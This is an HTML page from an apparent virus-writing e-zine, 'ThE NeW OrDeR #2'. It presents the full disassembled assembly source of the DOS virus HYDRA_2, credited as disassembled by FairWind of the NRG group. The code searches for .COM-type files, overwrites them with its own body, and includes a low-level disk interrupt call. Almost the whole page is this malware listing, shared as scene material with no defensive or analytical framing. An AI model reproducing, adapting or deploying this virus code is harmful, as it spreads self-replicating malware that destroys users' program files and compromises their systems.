<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>HYDRA_2</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>DATA_1E EQU 235H<br>
DATA_2E EQU 522H<br>
DATA_3E EQU 80H<br>
DATA_13E EQU 157H<br>
DATA_14E EQU 15AH<br>
<br>
SEG_A SEGMENT BYTE PUBLIC<br>
ASSUME CS:SEG_A, DS:SEG_A<br>
<br>
<br>
ORG 100h<br>
<br>
HYDRA2 PROC FAR<br>
<br>
START:<br>
JMP LOC_1 ; (0182)<br>
DB 59H, 44H, 00H, 00H<br>
DATA_5 DB 'HyDra-2 Beta - Not For Release'<br>
DB '. *.CO?'<br>
DB 0<br>
DATA_8 DW 0, 84FCH<br>
DATA_10 DW 0<br>
DATA_11 DB 0<br>
DB 29 DUP (0)<br>
DATA_12 DB 0<br>
DB 13 DUP (0)<br>
COPYRIGHT DB 'Copyright (c)'<br>
DB ' 1991 by C.A.V.E. '<br>
LOC_1:<br>
PUSH AX<br>
MOV AX,CS<br>
ADD AX,1000H<br>
XOR DI,DI<br>
MOV CX,157H<br>
MOV SI,OFFSET DS:[100H]<br>
MOV ES,AX<br>
REP MOVSB<br>
MOV AH,1AH<br>
MOV DX,OFFSET DATA_11<br>
INT 21H<br>
MOV AH,4EH<br>
MOV DX,OFFSET DATA_5+22H<br>
INT 21H<br>
JC LOC_5<br>
LOC_2:<br>
MOV AH,3DH<br>
MOV AL,2<br>
MOV DX,OFFSET DATA_12<br>
MOV AL,2<br>
INT 21H<br>
MOV BX,AX<br>
PUSH ES<br>
POP DS<br>
MOV AX,3F00H<br>
MOV CX,0FFFFH<br>
MOV DX,DATA_13E<br>
INT 21H<br>
ADD AX,157H<br>
MOV CS:DATA_10,AX<br>
CMP WORD PTR DS:DATA_14E,4459H<br>
JNE LOC_3<br>
MOV AH,3EH<br>
INT 21H<br>
PUSH CS<br>
POP DS<br>
MOV AH,4FH<br>
INT 21H<br>
JC LOC_6<br>
JMP SHORT LOC_2 ; (01A4)<br>
LOC_3:<br>
XOR CX,CX<br>
MOV DX,CX<br>
MOV AX,4200H<br>
INT 21H<br>
JC LOC_4<br>
MOV AH,40H<br>
XOR DX,DX<br>
MOV CX,CS:DATA_10<br>
INT 21H<br>
LOC_4:<br>
MOV AH,3EH<br>
INT 21H<br>
PUSH CS<br>
POP DS<br>
LOC_5:<br>
MOV AH,1AH<br>
MOV DX,DATA_3E<br>
INT 21H<br>
JMP SHORT LOC_7 ; (0218)<br>
DB 90H<br>
LOC_6:<br>
PUSH DX<br>
XOR AX,AX<br>
XOR AX,AX<br>
MOV DS,AX<br>
MOV BX,DATA_2E<br>
MOV AH,0FFH<br>
MOV [BX],AH<br>
XOR AX,AX<br>
INT 13H <br>
MOV AX,0<br>
INT 21H<br>
LOC_7:<br>
XOR DI,DI<br>
MOV SI,DATA_1E<br>
MOV CX,22H<br>
REP MOVSB<br>
POP BX<br>
MOV CS:DATA_8,0<br>
MOV WORD PTR CS:DATA_8+2,ES<br>
POP BX<br>
JMP DWORD PTR CS:DATA_8<br>
DB 1EH, 07H,0B9H,0FFH,0FFH,0BEH<br>
DB 57H, 02H,0BFH, 00H, 01H, 2BH<br>
DB 0CEH,0F3H,0A4H, 2EH,0C7H, 06H<br>
DB 00H, 01H, 00H, 01H, 2EH, 8CH<br>
DB 1EH, 02H, 01H, 8BH,0C3H, 2EH<br>
DB 0FFH, 2EH, 00H, 01H,0CDH<br>
DB 20H<br>
<br>
HYDRA2 ENDP<br>
<br>
SEG_A ENDS<br>
<br>
<br>
<br>
END START</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
